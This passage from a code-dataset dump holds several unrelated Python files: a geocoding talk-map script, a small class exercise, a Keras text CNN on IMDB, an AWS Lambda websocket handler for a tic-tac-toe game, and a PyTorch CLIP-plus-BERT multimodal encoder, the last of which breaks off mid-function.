len(searchstring)\n lines_trim = lines[loc_start:]\n loc_end = lines_trim.find(endstring)\n location = lines_trim[:loc_end]\n \n if \" and \" in location:\n print(\"Multi-Searching for \" + location)\n for l in location.split(\" and \"):\n print(\"Searching for \" + l) \n location_dict[l] = geocoder.geocode(l)\n print(l, \"\\n\", location_dict[l]) \n else:\n print(\"Searching for \" + location) \n location_dict[location] = geocoder.geocode(location)\n print(location, \"\\n\", location_dict[location])\n\n\nm = getorg.orgmap.create_map_obj()\ngetorg.orgmap.output_html_cluster_map(location_dict, folder_name=\"../talkmap\", hashed_usernames=False)\n\n\n\n\n","sub_path":"talkmap.py","file_name":"talkmap.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"348392834","text":"class Lab:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n def info(self):\n print(\"X: = \",self.x)\n print(\"Y: = \",self.y)\n\n def mat(self):\n s = self.x*self.x+self.y*self.y\n print(\"RESULT: = \",s)\n\nx = float(input(\"write x\"))\ny = float(input(\"write y\"))\nexem = Lab(x,y)\nprint(exem.info())\nprint(exem.mat())","sub_path":"lab_6/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332773940","text":"from Unit import *\nfrom keras.datasets import imdb\nfrom keras.models import Sequential\nfrom keras import layers\nfrom keras.preprocessing import sequence\nfrom keras.optimizers import RMSprop\nmax_feature = 10000\nmax_len = 500\nprint(\"Loading data......\")\n(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_feature)\n\nx_train = sequence.pad_sequences(x_train, maxlen=max_len)\nx_test = sequence.pad_sequences(x_test, maxlen=max_len)\n\n\nmodel = Sequential()\nmodel.add(layers.Embedding(max_feature, 128, input_length=max_len))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\nmodel.add(layers.MaxPooling1D(5))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\nmodel.add(layers.GlobalMaxPool1D())\nmodel.add(layers.Dense(1))\n\nmodel.summary()\n\nmodel.compile(optimizer=RMSprop(lr=1e-4),\n loss='binary_crossentropy',\n metrics=['acc']\n )\nhistory = model.fit(x_train, y_train, epochs=10, batch_size=128, validation_split=0.2)\nDraw(history)\n\n\n\n\n","sub_path":"one_dimCNN.py","file_name":"one_dimCNN.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268369391","text":"from ttt.dynamodb import clients_table, rooms_table\nfrom ttt import utils, ws\n\n\ndef lambda_handler(event, context):\n connection_id = ws.get_connection_id(event)\n room_name = clients_table.get_room(connection_id)\n\n if room_name is not None:\n payload = ws.get_message_payload(event)\n step = payload['step']\n\n new_state = jump_to(room_name, step)\n if new_state is not None:\n new_state = utils.replace_decimals(new_state)\n for room_connection_id in rooms_table.get_connection_ids(room_name):\n ws.send_message(room_connection_id, 'state', new_state)\n return {\n 'statusCode': 200,\n 'body': 'Success',\n }\n\n\ndef jump_to(room_name, step):\n room = rooms_table.get(room_name)\n state = room[rooms_table.AttributeNames.STATE]\n version = room[rooms_table.AttributeNames.VERSION]\n\n history = state[rooms_table.StateAttributeNames.HISTORY]\n if step < 0 or step >= len(history):\n return None\n\n state[rooms_table.StateAttributeNames.STEP_NUMBER] = step\n state[rooms_table.StateAttributeNames.X_IS_NEXT] = (step % 2) == 0\n\n return state if rooms_table.update(room_name, state, version) else None\n","sub_path":"aws/src/ttt/functions/api/ws/jump_to.py","file_name":"jump_to.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90237103","text":"from typing import Any, Optional, Tuple\nimport math\n\nimport copy\nimport torch\nfrom torch import nn, Tensor, device\n\nfrom transformers.activations import ACT2FN\nfrom transformers.modeling_utils import (\n PreTrainedModel,\n apply_chunking_to_forward,\n)\nfrom transformers.configuration_utils import PretrainedConfig\nfrom transformers.modeling_outputs import BaseModelOutput, BaseModelOutputWithPooling\n\n# some function\ndef get_extended_attention_mask(attention_mask: Tensor, input_shape: Tuple[int], device: device) -> Tensor:\n \"\"\"\n Makes broadcastable attention and causal masks so that future and masked tokens are ignored.\n\n Arguments:\n attention_mask (:obj:`torch.Tensor`):\n Mask with ones indicating tokens to attend to, zeros for tokens to ignore.\n input_shape (:obj:`Tuple[int]`):\n The shape of the input to the model.\n device: (:obj:`torch.device`):\n The device of the input to the model.\n\n Returns:\n :obj:`torch.Tensor` The extended attention mask, with a the same dtype as :obj:`attention_mask.dtype`.\n \"\"\"\n # We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]\n # ourselves in which case we just need to make it broadcastable to all heads.\n if attention_mask.dim() == 3:\n extended_attention_mask = attention_mask[:, None, :, :]\n elif attention_mask.dim() == 2:\n # Provided a padding mask of dimensions [batch_size, seq_length]\n # - if the model is a decoder, apply a causal mask in addition to the padding mask\n # - if the model is an encoder, make the mask broadcastable to [batch_size, num_heads, seq_length, seq_length]\n extended_attention_mask = attention_mask[:, None, None, :]\n else:\n raise ValueError(\n f\"Wrong shape for input_ids (shape {input_shape}) or attention_mask (shape {attention_mask.shape})\"\n )\n\n # Since attention_mask is 1.0 for positions we want to attend and 0.0 for\n # masked positions, this operation will create a tensor which is 0.0 for\n # positions we want to attend and -10000.0 for masked positions.\n # Since we are adding it to the raw scores before the softmax, this is\n # effectively the same as removing these entirely.\n extended_attention_mask = extended_attention_mask.to(dtype=torch.long) # fp16 compatibility\n extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0\n return extended_attention_mask\n\n\ndef get_head_mask(\n head_mask: Optional[Tensor], num_hidden_layers: int, is_attention_chunked: bool = False\n ) -> Tensor:\n \"\"\"\n Prepare the head mask if needed.\n\n Args:\n head_mask (:obj:`torch.Tensor` with shape :obj:`[num_heads]` or :obj:`[num_hidden_layers x num_heads]`, `optional`):\n The mask indicating if we should keep the heads or not (1.0 for keep, 0.0 for discard).\n num_hidden_layers (:obj:`int`):\n The number of hidden layers in the model.\n is_attention_chunked: (:obj:`bool`, `optional`, defaults to :obj:`False`):\n Whether or not the attentions scores are computed by chunks or not.\n\n Returns:\n :obj:`torch.Tensor` with shape :obj:`[num_hidden_layers x batch x num_heads x seq_length x seq_length]` or\n list with :obj:`[None]` for each layer.\n \"\"\"\n head_mask = [None] * num_hidden_layers\n\n return head_mask\n\n\n# models\nclass IFAConfig(PretrainedConfig):\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass IFAPreTrainedModel(PreTrainedModel):\n config_class = IFAConfig\n base_model_prefix = \"clip\"\n supports_gradient_checkpointing = True\n _keys_to_ignore_on_load_missing = [r\"position_ids\"]\n \n def __init_weights(self, module):\n pass\n\n\nclass CLIPVisionEmbeddings(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.embed_dim = config.hidden_size\n self.image_size = config.image_size\n self.patch_size = config.patch_size\n\n self.class_embedding = nn.Parameter(torch.randn(self.embed_dim))\n\n self.patch_embedding = nn.Conv2d(\n in_channels=3, out_channels=self.embed_dim, kernel_size=self.patch_size, stride=self.patch_size, bias=False\n )\n\n self.num_patches = (self.image_size // self.patch_size) ** 2\n self.num_positions = self.num_patches + 1\n self.position_embedding = nn.Embedding(self.num_positions, self.embed_dim)\n self.register_buffer(\"position_ids\", torch.arange(self.num_positions).expand((1, -1)))\n\n self.aux_position_embedding = nn.Embedding(48, self.embed_dim)\n self.register_buffer(\"aux_position_ids\", torch.arange(48).expand((1, -1)))\n\n self.rcnn_position_embedding = nn.Embedding(12, self.embed_dim)\n self.register_buffer(\"rcnn_position_ids\", torch.arange(12).expand((1, -1)))\n\n def forward(self, pixel_values, aux_embeddings=None, rcnn_embeddings=None):\n batch_size = pixel_values.shape[0]\n\n class_embeds = self.class_embedding.expand(batch_size, 1, -1)\n embeddings = class_embeds\n\n if aux_embeddings is not None:\n aux_embeds = []\n for aux_embedding in aux_embeddings:\n aux_embed = self.patch_embedding(aux_embedding)\n aux_embed = aux_embed.flatten(2).transpose(1, 2).flatten(0, 1) # 3*16, 768 3个子图\n aux_embeds.append(aux_embed)\n aux_embeds = torch.stack(aux_embeds) # bsz, 48, 768\n aux_embeds = aux_embeds + self.aux_position_embedding(self.aux_position_ids)\n embeddings = torch.cat((embeddings, aux_embeds), dim=1)\n\n if rcnn_embeddings is not None:\n rcnn_embeds = []\n for rcnn_embedding in rcnn_embeddings:\n rcnn_embed = self.patch_embedding(rcnn_embedding)\n rcnn_embed = rcnn_embed.flatten(2).transpose(1, 2).flatten(0, 1) # 3*4, 768 3个子图\n rcnn_embeds.append(rcnn_embed)\n rcnn_embeds = torch.stack(rcnn_embeds) # bsz, 12, 768\n rcnn_embeds = rcnn_embeds + self.rcnn_position_embedding(self.rcnn_position_ids)\n embeddings = torch.cat((embeddings, rcnn_embeds), dim=1)\n return embeddings\n\n\nclass BertEmbeddings(nn.Module):\n \"\"\"Construct the embeddings from word, position and token_type embeddings.\"\"\"\n\n def __init__(self, config):\n super().__init__()\n self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)\n self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)\n self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)\n\n # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load\n # any TensorFlow checkpoint file\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n # position_ids (1, len position emb) is contiguous in memory and exported when serialized\n self.position_embedding_type = getattr(config, \"position_embedding_type\", \"absolute\")\n self.register_buffer(\"position_ids\", torch.arange(config.max_position_embeddings).expand((1, -1)))\n\n def forward(\n self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, past_key_values_length=0\n ):\n if input_ids is not None:\n input_shape = input_ids.size()\n else:\n input_shape = inputs_embeds.size()[:-1]\n\n seq_length = input_shape[1]\n\n if position_ids is None:\n position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length]\n\n # Setting the token_type_ids to the registered buffer in constructor where it is all zeros, which usually occurs\n # when its auto-generated, registered buffer helps users when tracing the model without passing token_type_ids, solves\n # issue #5664\n if token_type_ids is None:\n if hasattr(self, \"token_type_ids\"):\n buffered_token_type_ids = self.token_type_ids[:, :seq_length]\n buffered_token_type_ids_expanded = buffered_token_type_ids.expand(input_shape[0], seq_length)\n token_type_ids = buffered_token_type_ids_expanded\n else:\n token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)\n\n if inputs_embeds is None:\n inputs_embeds = self.word_embeddings(input_ids)\n token_type_embeddings = self.token_type_embeddings(token_type_ids)\n\n embeddings = inputs_embeds + token_type_embeddings\n if self.position_embedding_type == \"absolute\":\n position_embeddings = self.position_embeddings(position_ids)\n embeddings += position_embeddings\n embeddings = self.LayerNorm(embeddings)\n embeddings = self.dropout(embeddings)\n return embeddings\n\n\nclass CLIPAttention(nn.Module):\n \"\"\"Multi-headed attention from 'Attention Is All You Need' paper\"\"\"\n\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.embed_dim = config.hidden_size\n self.num_heads = config.num_attention_heads\n self.head_dim = self.embed_dim // self.num_heads\n assert (\n self.head_dim * self.num_heads == self.embed_dim\n ), f\"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {self.num_heads}).\"\n self.scale = self.head_dim ** -0.5\n self.dropout = config.attention_dropout\n\n self.k_proj = nn.Linear(self.embed_dim, self.embed_dim)\n self.v_proj = nn.Linear(self.embed_dim, self.embed_dim)\n self.q_proj = nn.Linear(self.embed_dim, self.embed_dim)\n self.out_proj = nn.Linear(self.embed_dim, self.embed_dim)\n\n def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):\n return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n output_attentions: bool = False,\n past_key_values: torch.Tensor = None,\n current_layer: int = None,\n output_qks=None,\n ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:\n \"\"\"Input shape: Batch x Time x Channel\"\"\"\n\n bsz, tgt_len, embed_dim = hidden_states.size()\n\n # get query proj\n query_states = self.q_proj(hidden_states) * self.scale\n key_states = self._shape(self.k_proj(hidden_states), -1, bsz)\n value_states = self._shape(self.v_proj(hidden_states), -1, bsz)\n qks = (key_states, value_states) if output_qks else None\n\n\n if past_key_values is not None:\n key_states = torch.cat([past_key_values[0], key_states], dim=2)\n value_states = torch.cat([past_key_values[1], value_states], dim=2)\n\n proj_shape = (bsz * self.num_heads, -1, self.head_dim)\n query_states = self._shape(query_states, tgt_len, bsz)\n\n query_states = query_states.view(*proj_shape)\n key_states = key_states.view(*proj_shape)\n value_states = value_states.view(*proj_shape)\n \n src_len = key_states.size(1)\n attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))\n\n if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len):\n raise ValueError(\n f\"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is {attn_weights.size()}\"\n ) \n attn_weights = nn.functional.softmax(attn_weights, dim=-1)\n\n if output_attentions:\n # this operation is a bit akward, but it's required to\n # make sure that attn_weights keeps its gradient.\n # In order to do so, attn_weights have to reshaped\n # twice and have to be reused in the following\n attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)\n attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len)\n else:\n attn_weights_reshaped = None\n\n attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)\n\n attn_output = torch.bmm(attn_probs, value_states)\n\n if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim):\n raise ValueError(\n f\"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is {attn_output.size()}\"\n )\n\n attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)\n attn_output = attn_output.transpose(1, 2)\n attn_output = attn_output.reshape(bsz, tgt_len, embed_dim)\n\n attn_output = self.out_proj(attn_output)\n\n return attn_output, attn_weights_reshaped, qks\n\ndef quick_gelu(x):\n return x * torch.sigmoid(1.702 * x)\n\nclass CLIPMLP(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.config = config\n self.activation_fn = quick_gelu\n self.fc1 = nn.Linear(config.hidden_size, config.intermediate_size)\n self.fc2 = nn.Linear(config.intermediate_size, config.hidden_size)\n\n def forward(self, hidden_states):\n hidden_states = self.fc1(hidden_states)\n hidden_states = self.activation_fn(hidden_states)\n hidden_states = self.fc2(hidden_states)\n return hidden_states\n\n\nclass BertSelfAttention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.num_attention_heads = config.num_attention_heads # 12\n self.attention_head_size = int(config.hidden_size / config.num_attention_heads) # 64\n self.all_head_size = self.num_attention_heads * self.attention_head_size # 768\n\n self.query = nn.Linear(config.hidden_size, self.all_head_size)\n self.key = nn.Linear(config.hidden_size, self.all_head_size)\n self.value = nn.Linear(config.hidden_size, self.all_head_size)\n\n self.dropout = nn.Dropout(config.attention_probs_dropout_prob)\n\n def transpose_for_scores(self, x):\n new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)\n x = x.view(*new_x_shape)\n return x.permute(0, 2, 1, 3)\n\n def forward(\n self,\n hidden_states,\n attention_mask=None,\n head_mask=None,\n output_attentions=False,\n visual_hidden_state=None,\n output_qks=None,\n current_layer=None,\n past_key_values=None,\n ):\n mixed_query_layer = self.query(hidden_states)\n\n # If this is instantiated as a cross-attention module, the keys\n # and values come from an encoder; the attention mask needs to be\n # such that the encoder's padding tokens are not attended to.\n key_layer = self.transpose_for_scores(self.key(hidden_states))\n value_layer = self.transpose_for_scores(self.value(hidden_states))\n query_layer = self.transpose_for_scores(mixed_query_layer)\n\n qks = (key_layer, value_layer) if output_qks else None\n\n if past_key_values is not None:\n key_layer = torch.cat([past_key_values[0], key_layer], dim=2)\n value_layer = torch.cat([past_key_values[0], value_layer], dim=2)\n # Take the dot product between \"query\" and \"key\" to get the raw attention scores.\n attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))\n attention_scores = attention_scores / math.sqrt(self.attention_head_size)\n if attention_mask is not None:\n # Apply the attention mask is (precomputed for all layers in BertModel forward() function)\n bsz, nheads, length, dsize = past_key_values[0].size()\n visual_attention_mask = torch.ones((bsz, 1, 1, length)).to(attention_mask.device) # bsz, 12, len, 64\n attention_mask = torch.cat((visual_attention_mask, attention_mask), dim=-1)\n attention_scores = attention_scores + attention_mask\n # Normalize the attention scores to probabilities.\n attention_probs = nn.Softmax(dim=-1)(attention_scores)\n\n # This is actually dropping out entire tokens to attend to, which might\n # seem a bit unusual, but is taken from the original Transformer paper.\n attention_probs = self.dropout(attention_probs)\n\n # Mask heads if we want to\n if head_mask is not None:\n attention_probs = attention_probs * head_mask\n context_layer = torch.matmul(attention_probs, value_layer)\n\n context_layer = context_layer.permute(0, 2, 1, 3).contiguous()\n new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)\n context_layer = context_layer.view(*new_context_layer_shape) # bsz, 128, 768\n \n outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)\n\n return outputs, qks\n\n\nclass BertSelfOutput(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\nclass BertAttention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.self = BertSelfAttention(config)\n self.output = BertSelfOutput(config)\n self.pruned_heads = set()\n\n def forward(\n self,\n hidden_states,\n attention_mask=None,\n head_mask=None,\n output_attentions=False,\n visual_hidden_state=None,\n output_qks=None,\n current_layer=None,\n past_key_values=None,\n ):\n self_outputs, qks = self.self(\n hidden_states,\n attention_mask,\n head_mask,\n output_attentions,\n visual_hidden_state,\n output_qks,\n current_layer,\n past_key_values,\n )\n attention_output = self.output(self_outputs[0], hidden_states)\n outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them\n return outputs, qks\n\n\nclass BertIntermediate(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.hidden_size, config.intermediate_size)\n if isinstance(config.hidden_act, str):\n self.intermediate_act_fn = ACT2FN[config.hidden_act]\n else:\n self.intermediate_act_fn = config.hidden_act\n\n def forward(self, hidden_states):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n return hidden_states\n\n\nclass BertOutput(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.intermediate_size, config.hidden_size)\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\n\nclass CLIPEncoderLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.embed_dim = config.hidden_size\n self.self_attn = CLIPAttention(config)\n self.layer_norm1 = nn.LayerNorm(self.embed_dim)\n self.mlp = CLIPMLP(config)\n self.layer_norm2 = nn.LayerNorm(self.embed_dim)\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n output_attentions: bool = False,\n past_key_values: torch.Tensor = None,\n current_layer: int = None,\n output_qks = None\n ):\n \"\"\"\n Args:\n hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape :obj:`(seq_len, batch, embed_dim)`\n attention_mask (:obj:`torch.FloatTensor`): attention mask of size\n :obj:`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.\n layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size\n :obj:`(config.encoder_attention_heads,)`.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n \"\"\"\n residual = hidden_states\n\n hidden_states = self.layer_norm1(hidden_states)\n hidden_states, attn_weights, qks = self.self_attn(\n hidden_states=hidden_states,\n output_attentions=output_attentions,\n past_key_values=past_key_values,\n output_qks=output_qks,\n current_layer=current_layer,\n )\n hidden_states = residual + hidden_states\n\n residual = hidden_states\n hidden_states = self.layer_norm2(hidden_states)\n hidden_states = self.mlp(hidden_states)\n hidden_states = residual + hidden_states\n\n outputs = (hidden_states,)\n\n if output_attentions:\n outputs += (attn_weights,)\n \n if output_qks:\n outputs += (qks, )\n \n return outputs\n\n\nclass BertLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.chunk_size_feed_forward = config.chunk_size_feed_forward\n self.seq_len_dim = 1\n self.attention = BertAttention(config)\n self.add_cross_attention = config.add_cross_attention\n self.intermediate = BertIntermediate(config)\n self.output = BertOutput(config)\n\n def forward(\n self,\n hidden_states,\n attention_mask=None,\n head_mask=None,\n output_attentions=False,\n visual_hidden_state=None,\n output_qks=None,\n current_layer=None,\n past_key_values=None,\n ):\n # decoder uni-directional self-attention cached key/values tuple is at positions 1,2\n # self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None\n self_attention_outputs, qks = self.attention(\n hidden_states,\n attention_mask,\n head_mask,\n output_attentions=output_attentions,\n visual_hidden_state=visual_hidden_state,\n output_qks=output_qks,\n current_layer=current_layer,\n past_key_values=past_key_values,\n )\n attention_output = self_attention_outputs[0]\n\n outputs = self_attention_outputs[1:] # add self attentions if we output attention weights\n\n layer_output = apply_chunking_to_forward(\n self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output\n )\n outputs = (layer_output,) + outputs\n if output_qks: \n outputs += (qks,)\n\n return outputs\n\n def feed_forward_chunk(self, attention_output):\n intermediate_output = self.intermediate(attention_output)\n layer_output = self.output(intermediate_output, attention_output)\n return layer_output\n\n\nclass IFAEncoder(nn.Module):\n def __init__(self, vision_config, text_config):\n super().__init__()\n self.vision_config = vision_config\n self.text_config = text_config\n\n self.vision_layers = nn.ModuleList([CLIPEncoderLayer(vision_config) for _ in range(vision_config.num_hidden_layers)])\n self.text_layer = nn.ModuleList([BertLayer(text_config) for _ in range(text_config.num_hidden_layers)])\n \n def forward(\n self,\n vision_embeds=None,\n text_embeds=None,\n attention_mask=None,\n head_mask=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n assert self.vision_config.num_hidden_layers == self.text_config.num_hidden_layers\n\n all_vision_hidden_states = () if output_hidden_states else None\n all_text_hidden_states = () if output_hidden_states else None\n all_vision_attentions = () if output_attentions else None\n all_text_attentions = () if output_attentions else None\n \n vision_hidden_states = vision_embeds\n text_hidden_states = text_embeds\n for idx in range(self.vision_config.num_hidden_layers):\n if output_hidden_states:\n all_vision_hidden_states = all_vision_hidden_states + (vision_hidden_states, )\n all_text_hidden_states = all_text_hidden_states + (text_hidden_states, )\n \n # vision\n # TODO: 9-12 layers past text as pkv to vision\n output_qks = True\n if idx == 0:\n bsz, length, dsize = text_embeds.size()\n visual_past_key_values = (text_embeds.view(bsz, 12, length, dsize//12),\n text_embeds.view(bsz, 12, length, dsize//12))\n else:\n visual_past_key_values = text_layer_output[-1]\n vision_layer_module = self.vision_layers[idx]\n vision_layer_output = vision_layer_module(\n vision_hidden_states,\n output_attentions=output_attentions,\n past_key_values=visual_past_key_values,\n current_layer=idx,\n output_qks=output_qks,\n )\n vision_hidden_states = vision_layer_output[0]\n\n # text\n # TODO: 9-12 layers past vison qks to text\n if idx == 0:\n bsz, length, dsize = vision_embeds.size()\n text_past_key_values = (vision_embeds.view(bsz, 12, length, dsize//12),\n vision_embeds.view(bsz, 12, length, dsize//12))\n else:\n text_past_key_values = vision_layer_output[-1]\n\n layer_head_mask = head_mask[idx] if head_mask is not None else None\n text_layer_module = self.text_layer[idx]\n text_layer_output = text_layer_module(\n text_hidden_states,\n attention_mask=attention_mask,\n head_mask=layer_head_mask,\n visual_hidden_state=None,\n past_key_values=text_past_key_values,\n output_attentions=output_attentions,\n output_qks=output_qks,\n current_layer=idx,\n )\n text_hidden_states = text_layer_output[0]\n if output_attentions:\n all_vision_attentions = all_vision_attentions + (vision_layer_output[1], )\n all_text_attentions = all_text_attentions + (text_layer_output[1], )\n \n if output_hidden_states:\n all_vision_hidden_states = all_vision_hidden_states + (vision_hidden_states, )\n all_text_hidden_states = all_text_hidden_states + (text_hidden_states, )\n \n if not return_dict:\n return tuple(\n v for v in [\n text_hidden_states,\n all_text_hidden_states,\n all_text_attentions,\n ] if v is not None)\n return BaseModelOutput(\n last_hidden_state=text_hidden_states, hidden_states=all_text_hidden_states, attentions=all_text_attentions\n )\n\n\nclass BertPooler(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.activation = nn.Tanh()\n\n def forward(self, hidden_states):\n # We \"pool\" the model by simply taking the hidden state corresponding\n # to the first token.\n first_token_tensor = hidden_states[:, 0]\n pooled_output = self.dense(first_token_tensor)\n pooled_output = self.activation(pooled_output)\n return pooled_output\n\n\nclass IFAModel(nn.Module):\n def __init__(self, vision_config, text_config, add_pooling_layer=True):\n super(IFAModel, self).__init__()\n # vision model\n self.vision_config = vision_config\n self.vision_embeddings = CLIPVisionEmbeddings(vision_config)\n self.vision_pre_layrnorm = nn.LayerNorm(vision_config.hidden_size)\n self.vision_post_layernorm = nn.LayerNorm(vision_config.hidden_size)\n\n # text model\n self.text_config = text_config\n self.text_embeddings = BertEmbeddings(text_config)\n self.text_pooler = BertPooler(text_config) if add_pooling_layer else None\n\n # all\n self.encoder = IFAEncoder(vision_config, text_config)\n\n self.device = vision_config.device\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n \n pixel_values=None,\n aux_values=None, \n rcnn_values=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n # pre vision\n vision_embedding_output = self.vision_embeddings(pixel_values, aux_values, rcnn_values)\n vision_embedding_output = self.vision_pre_layrnorm(vision_embedding_output)\n\n # pre text\n input_shape = input_ids.size()\n batch_size, seq_length = input_shape\n device = input_ids.device\n if attention_mask is None:\n attention_mask = torch.ones(((batch_size, seq_length)), device=device)\n if token_type_ids is None:\n raise ValueError(\"token_type_ids is None!\")\n\n extended_attention_mask: torch.Tensor = get_extended_attention_mask(attention_mask, input_shape, device)\n head_mask = get_head_mask(head_mask, self.text_config.num_hidden_layers) # [None]*12\n\n text_embedding_output = self.text_embeddings(\n input_ids=input_ids,\n position_ids=position_ids,\n token_type_ids=token_type_ids,\n )\n\n # all encoder\n encoder_outputs = self.encoder(\n vision_embeds=vision_embedding_output,\n text_embeds=text_embedding_output,\n attention_mask=extended_attention_mask,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n sequence_output = encoder_outputs[0]\n pooled_output = self.text_pooler(sequence_output) if self.text_pooler is not None else None\n\n if not return_dict:\n return (sequence_output, pooled_output) + encoder_outputs[1:]\n\n return BaseModelOutputWithPooling(\n last_hidden_state=sequence_output,\n pooler_output=pooled_output,\n hidden_states=encoder_outputs.hidden_states,\n attentions=encoder_outputs.attentions,\n )\n\n def _init_text_weights(self, module):\n \"\"\"Initialize the weights\"\"\"\n if isinstance(module, nn.Linear):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=self.text_config.initializer_range)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=self.text_config.initializer_range)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n elif isinstance(module, nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n\n def get_input_embeddings(self):\n return self.text_embeddings.word_embeddings\n\n def set_input_embeddings(self, value):\n self.text_embeddings.word_embeddings = value\n\n def resize_token_embeddings(self, new_num_tokens):\n old_embeddings = self.get_input_embeddings()\n new_embeddings = self._get_resized_embeddings(old_embeddings, new_num_tokens)\n self.set_input_embeddings(new_embeddings)\n\n def _get_resized_embeddings(\n self, old_embeddings: nn.Embedding, new_num_tokens: Optional[int] = None\n ) -> nn.Embedding:\n \"\"\"\n Build a resized Embedding Module from a provided token Embedding Module. Increasing the size will add newly\n initialized vectors at the end. Reducing the size will remove vectors from the end\n\n Args:\n old_embeddings (:obj:`torch.nn.Embedding`):\n Old embeddings to be resized.\n new_num_tokens (:obj:`int`, `optional`):\n New number of tokens in the embedding matrix.\n\n Increasing the size will add newly initialized vectors at the end. Reducing the size will remove\n vectors from the end. If not provided or :obj:`None`, just returns a pointer to the input tokens\n :obj:`torch.nn.Embedding`` module of the model without doing anything.\n\n Return:\n :obj:`torch.nn.Embedding`: Pointer to the resized Embedding Module or the old Embedding Module if\n :obj:`new_num_tokens` is :obj:`None`\n \"\"\"\n if new_num_tokens is None:\n return old_embeddings\n else:\n old_num_tokens, old_embedding_dim = old_embeddings.weight.size()\n\n if old_num_tokens == new_num_tokens:\n 